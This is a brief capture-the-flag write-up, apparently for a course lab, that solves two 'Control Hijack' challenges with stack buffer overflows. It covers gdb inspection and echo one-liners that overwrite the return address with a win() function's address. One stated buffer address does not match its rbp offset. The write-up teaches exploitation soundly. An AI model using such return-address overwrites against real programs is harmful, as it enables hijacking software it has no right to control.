Control Hijack¶
Control Hijack (easy)¶
As told in the debug output, the return address is stored 104 bytes from input buffer and has to be changed to 0x40229e
echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x9e\x22\x40\x00\x00\x00\x00\x00" | /challenge/binary-exploitation-control-hijack-w
Control Hijack (hard)¶
-
In gdb,
info functionsanddisas main, we get to know:- win() is at 0x00000000004013b4
- challenge() returns at 0x000000000040167b
-
Set a breakpoint
b *challenge+242, run and give a short string of a's as input info frame-> rbp is at 0x7fffc56bb090x/100xg $rbp-200:- input buffer starts at 0x7fffc56ba000, which is rbp-0x90 = rbp-144
- return address is stored at 0x7fffc56bb098, which is rbp+0x8 = rbp+8
-
152 a's followed by desired address:
shell echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xb4\x13\x40\x00\x00\x00\x00\x00" | /challenge/binary-exploitation-control-hijack